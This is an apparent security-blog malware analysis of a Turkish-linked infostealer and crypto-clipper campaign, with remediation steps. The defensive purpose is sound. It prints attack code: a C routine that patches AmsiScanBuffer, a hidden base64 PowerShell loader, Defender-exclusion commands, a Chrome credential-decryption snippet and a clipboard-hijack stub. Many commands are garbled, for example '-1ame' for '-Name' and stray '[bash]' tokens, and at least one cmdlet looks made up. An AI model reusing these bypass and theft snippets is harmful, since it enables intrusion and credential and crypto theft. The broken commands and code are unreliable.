Inside the DigitalOcean Cryptostealer: A Turkish-Linked Infostealer and Clipper Campaign with Five-Layer Persistence + Video

Listen to this Post

Featured Image

Introduction

A sophisticated, Turkish-speaking threat actor has been running an active infostealer and cryptocurrency clipper campaign since at least June 23, 2026, with the latest payload update occurring on July 6. What sets this operation apart from typical commodity malware is its entire toolkit sitting in an open directory on a DigitalOcean node (46.101.111.120:8080) with anonymous read-write access, version-stamped backups showing rapid iteration from early builds to v5 in under two weeks. This represents a maintained, actively developed operation rather than a disposable dropper, employing layered evasion techniques including AMSI and ETW patching, crypto wallet clipping across eight coins, and a five-pronged persistence mechanism designed to survive even aggressive remediation attempts.

Learning Objectives

  • Understand the complete infection chain from malicious Word documents to PowerShell installers and Python payloads
  • Analyze the AMSI and ETW bypass techniques used to evade endpoint detection
  • Master the five-layer persistence architecture and develop effective remediation strategies
  • Learn to identify and mitigate crypto-clipper clipboard manipulation attacks
  • Build defensive playbooks against multi-stage infostealer campaigns

You Should Know

  1. The Delivery Chain: From Word Document to Memory Payload

The primary delivery vector leverages social engineering through a macro-enabled Word document named “Q1 Quarterly Report 2025.docm.” When opened, the document’s macro fires immediately, XOR-decoding a URL and pulling a batch script into the %TEMP% directory under an obfuscated filename. This batch script chains to a PowerShell installer that ultimately delivers the main payload. The operator maintains multiple delivery options, with additional vectors including .pdf.lnk files, zipped variants, .hta files, and .vbs loaders all sitting in the same open directory.

To understand this chain from a defensive perspective, security analysts should examine their environment for suspicious macro execution patterns. The following PowerShell command helps identify recently created .docm files in common download locations:

Get-ChildItem -Path "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Desktop" -Filter ".docm" -Recurse | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-7)}

For Windows environments, disabling macros via Group Policy is the primary defense. Administrators can enforce this using:

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Word\Security" -1ame "VBAWarnings" -Value 2

On Linux systems that might handle Office documents through conversion tools, consider using `libreoffice –headless –convert-to txt` to strip macros from documents before processing.

The batch script pulled from the C2 typically executes with the following pattern, which defenders can search for in their logs:

@echo off
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -1oProfile -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_SCRIPT')))"

To detect such activity, implement Windows Event Log monitoring for Event ID 4688 (Process Creation) looking for PowerShell with `-ExecutionPolicy Bypass` and -WindowStyle Hidden.

2. The Python Payload and Runtime Deployment

The installer drops a complete Python payload with a bundled runtime into %APPDATA%\Microsoft\Windows\Themes\Cache\—a path chosen to blend with legitimate Windows infrastructure. This directory mimics the legitimate Windows Themes cache location, making it less suspicious during casual inspection.

Before executing the main payload, the installer carves out Microsoft Defender exclusions for the drop directory, %TEMP%, and the Python binaries. This prevents Defender from scanning these locations and potentially detecting the malicious activity. The exclusions are typically added using:

Add-MpPreference -ExclusionPath "$env:APPDATA\Microsoft\Windows\Themes\Cache\"
Add-MpPreference -ExclusionPath "$env:TEMP"
Add-MpPreference -ExclusionProcess "python.exe","python3.exe"

To check for suspicious Defender exclusions in your environment, use:

Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
Get-MpPreference | Select-Object -ExpandProperty ExclusionProcess

The Python payload itself is heavily layered: Base64 decoded, XOR-decrypted against a rolling SHA-256 digest, then marshalled bytecode executed in memory. This means traditional file-based scanning will miss it entirely. Defenders should monitor for Python processes spawned from unusual locations:

Get-Process -1ame python | Where-Object {$_.Path -like "Themes\Cache"}

3. AMSI and ETW Patches: Silencing Security Controls

The most technically sophisticated aspect of this campaign is its in-memory patching of AMSI (Anti-Malware Scan Interface) and ETW (Event Tracing for Windows). The malware performs two critical patches:

AMSI Bypass: The `AmsiScanBuffer` function is forced to return `E_INVALIDARG` (0x80070057), effectively disabling AMSI scanning for the current process. This prevents PowerShell and scripting engines from being scanned.

ETW Stub: The `EtwEventWrite` function is patched to a bare return, silencing Event Tracing for Windows. This means Sysmon, Defender’s ETW consumers, and any EDR solution relying on event tracing are blinded to what follows.

These patches are implemented through process injection and memory manipulation, often using Windows APIs like `WriteProcessMemory` with the `VirtualProtect` function to modify memory protections first. A simplified version of the technique:

include <windows.h>
include <amsi.h>

void PatchAMSI() {
HMODULE hAmsi = LoadLibraryW(L"amsi.dll");
FARPROC pAmsiScanBuffer = GetProcAddress(hAmsi, "AmsiScanBuffer");
DWORD oldProtect;
VirtualProtect(pAmsiScanBuffer, 6, PAGE_READWRITE, &oldProtect);
// Write return instruction (mov eax, 0x80070057; ret)
unsigned char patch[] = {0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3};
memcpy(pAmsiScanBuffer, patch, sizeof(patch));
VirtualProtect(pAmsiScanBuffer, 6, oldProtect, &oldProtect);
}

Defenders can detect this by monitoring for calls to `VirtualProtect` on AMSI and ETW DLLs in memory. Use Sysmon Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread) to identify suspicious memory modifications.

4. Data Theft: Credentials, Cards, and File Inventory

The infostealer component systematically extracts saved credentials and credit card information from Chrome browsers. Chrome credentials are decrypted using the standard Windows DPAPI (Data Protection API) plus AES-GCM path. The malware first obtains the browser’s encrypted key from the Local State file, then decrypts it using DPAPI to derive the master key used for credential decryption.

A similar Python function used by such malware to extract Chrome credentials would look like:

import os
import json
import base64
import win32crypt
from Crypto.Cipher import AES

def get_chrome_creds():
local_state = os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Local State'
with open(local_state, 'r') as f:
encrypted_key = json.load(f)['os_crypt']['encrypted_key']
encrypted_key = base64.b64decode(encrypted_key)[5:]  Remove 'DPAPI' prefix
master_key = win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[bash]
 Then decrypt saved credentials using AES-GCM with the master key

Alongside credential theft, the malware walks the entire user directory, building a comprehensive file inventory that is also exfiltrated. This data is exfiltrated to the C2 over HTTPS as a JSON POST payload. If the primary channel fails, a Gmail SMTP fallback sends the same data as an HTML attachment.

To detect such exfiltration, monitor network connections to DuckDNS domains (gogettate.duckdns.org on ports 443 and 4444) and implement outbound web filtering. On Linux, use `tcpdump` to capture suspicious traffic:

sudo tcpdump -i any -1 'host gogettate.duckdns.org' -w exfil.pcap

5. Crypto Clipper: Wallet Address Substitution

The malware includes a clipboard monitoring component that silently replaces copied cryptocurrency wallet addresses with the operator’s own addresses before the user pastes. This affects eight different cryptocurrencies: Bitcoin, Ethereum, Monero, Litecoin, Dogecoin, Dash, Zcash, and Bitcoin Cash.

The clipper works by setting up a Windows clipboard change notification and intercepting `CF_TEXT` and `CF_UNICODETEXT` clipboard formats:

import win32clipboard
import re

def clipboard_monitor():
wallet_patterns = {
'btc': re.compile(r'^[bash][a-km-zA-HJ-1P-Z1-9]{25,34}$'),
'eth': re.compile(r'^0x[a-fA-F0-9]{40}$'),
 Additional patterns for other coins
}

Hook clipboard change notification
 When a wallet address is copied, match pattern and replace

Users who copy-pasted crypto addresses on infected hosts in the last two weeks must verify those addresses before trusting them. Defenders should look for clipboard monitoring activities in their environment:

Get-Process | Where-Object {$<em>.Modules.ModuleName -contains "user32.dll"} | ForEach-Object {
if (Get-Process -Id $</em>.Id -Module | Where-Object {$<em>.FileName -like "clipboard"}) {
$</em>.ProcessName
}
}

6. The Five-Layer Persistence Nightmare

What makes this campaign particularly dangerous is its five-layer persistence mechanism, designed to survive even aggressive remediation attempts:

Layer 1 – Run Key: The `ThemeSvcHelper` entry in `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` triggers the payload at user login.

Layer 2 – Startup Script: A VBS script named `ThemeSvc.vbs` in the Startup folder ensures execution at boot.

Layer 3 – Scheduled Task (Frequent): `ThemeSvcCheck` runs every five minutes to verify the process is alive.

Layer 4 – Scheduled Task (Periodic): `ThemeSvcMaint` runs on a 22-hour cycle to rebuild missing components.

Layer 5 – WMI Subscription: `ThemeEvtFlt` and `ThemeEvtCns` in `root\subscription` fire a couple of minutes after each boot.

A watchdog process checks every five minutes whether the main payload is alive and holding its outbound connection. If the process is dead, it re-downloads and restarts it. The maintenance task goes further, rebuilding any missing persistence layer from scratch.

Remediation requires removing all five layers simultaneously. Security teams should use the following commands during incident response:

 Remove Run key
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -1ame "ThemeSvcHelper" -Force

Delete Startup script
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\ThemeSvc.vbs" -Force

Remove scheduled tasks
Unregister-ScheduledTask -TaskName "ThemeSvcCheck" -Confirm:$false
Unregister-ScheduledTask -TaskName "ThemeSvcMaint" -Confirm:$false

Remove WMI subscription
Get-WMIObject -1amespace root\subscription -Class __EventFilter | Where-Object {$<em>.Name -like "ThemeEvt"} | Remove-WmiObject
Get-WMIObject -1amespace root\subscription -Class __EventConsumer | Where-Object {$</em>.Name -like "ThemeEvt"} | Remove-WmiObject
Get-WMIObject -1amespace root\subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -like "ThemeEvt"} | Remove-WmiObject

For Linux-based forensic analysis of Windows artifacts, use `pstools` or the `reglookup` tool:

reglookup /mnt/windows/Windows/System32/config/SOFTWARE | grep -i ThemeSvcHelper

7. Defense Strategy and Mitigation

To protect against this campaign, organizations should implement the following defensive measures:

Network Defenses: Block `46.101.111.120` and `gogettate.duckdns.org` at the firewall level. Monitor for traffic on ports 443 and 4444 to these destinations.

Endpoint Protection: The YARA signature `WinMgmt2024Init 1` can be used to detect the malware on endpoints. Add this to your EDR’s custom detection rules.

AMS/ETW Integrity: Implement regular memory scanning for modifications to `amsi.dll` and `ntdll.dll` (where ETW is implemented). Use PowerShell to check integrity:

Get-AmsiContext | ForEach-Object { if ($_.ScanResult -eq 0x80070057) { Write-Warning "Potential AMSI bypass detected" } }

Clipboard Protection: Consider implementing clipboard monitoring detection in your EDR to identify applications that repeatedly access clipboard content.

User Training: Educate users about the risks of opening macro-enabled documents from untrusted sources, especially those named with financial reporting themes.

What Undercode Say

  • The rapid iteration from early builds to v5 within two weeks indicates a highly active operator who treats this as a professional operation, not a one-off scam. This level of development suggests the actor is technically proficient and committed to maintaining the campaign’s effectiveness against evolving defenses.

  • The five-layer persistence mechanism is deliberately designed to defeat standard incident response playbooks. Most IR teams check Run keys and scheduled tasks, but WMI subscriptions and the maintenance task that rebuilds missing layers require specialized knowledge to remove completely.

  • The AMSI and ETW patching represents a significant evasion technique that will likely become more common in 2026. By patching ETW specifically, the malware blinds Sysmon and any EDR relying on event tracing, making behavioral detection extremely difficult. This suggests the actor understands modern defense-in-depth architectures.

  • The open directory on DigitalOcean with anonymous read-write access represents a significant operational security failure. While the malware author likely intended to use this for easy updates, it also allows defenders to access version history and the full toolkit, providing valuable intelligence for signature development.

  • The Turkish language indicators and naming patterns point to a single operator or small team. This is credential and crypto theft for financial gain, not state-sponsored espionage, which means the actor is likely based in Turkey or the broader Turkish-speaking region.

  • The use of Gmail SMTP as a fallback exfiltration channel suggests the operator maintains multiple backup options. This redundancy shows the operator anticipates the primary C2 being blocked and has prepared alternative communication methods.

  • With the latest payload push on July 6, this campaign is still active and evolving. Defenders must assume new variants are being developed and deployed continuously, requiring ongoing monitoring and detection updates.

  • The crypto clipper component operating silently in the background represents a significant risk for cryptocurrency users. Unlike traditional banking trojans that require user interaction for authentication, the clipper operates automatically when wallet addresses are copied, making it difficult to detect without specialized monitoring.

  • Organizations should consider implementing application whitelisting to prevent unauthorized PowerShell and Python execution. While this may cause operational friction, it would effectively prevent this malware from executing in environments where Python is not normally used.

Prediction

+1 The exposure of the open directory and YARA signature will allow threat intelligence platforms to develop comprehensive signatures within the next 14 days, reducing the effectiveness of this specific campaign.

-1 The sophistication of the AMSI and ETW patches will likely be adopted by other threat actors, leading to a wave of similar attacks using these techniques throughout Q3 2026.

+1 The requirement to remove all five persistence layers simultaneously will drive improvements in incident response automation, with major EDR vendors likely releasing specific remediation scripts for this pattern.

-1 Smaller organizations without dedicated security teams are at highest risk, as manual removal of WMI subscriptions and scheduled tasks requires advanced Windows administration knowledge that many IT generalists lack.

-1 The cryptocurrency aspect of this campaign highlights the increasing intersection between traditional infostealers and crypto theft, suggesting that 2026 will see more malware combining credential harvesting with active wallet manipulation.

+1 The technical community’s rapid analysis of this campaign demonstrates the value of open threat intelligence sharing, with the DuckDNS and DigitalOcean infrastructure likely being blocked by security vendors within days.

-1 The rapid iteration from v1 to v5 in under two weeks indicates the operator is learning and adapting quickly, potentially developing v6 with enhanced evasion techniques before defenders can fully respond to the current version.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Zahidoverflow File134jpg – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky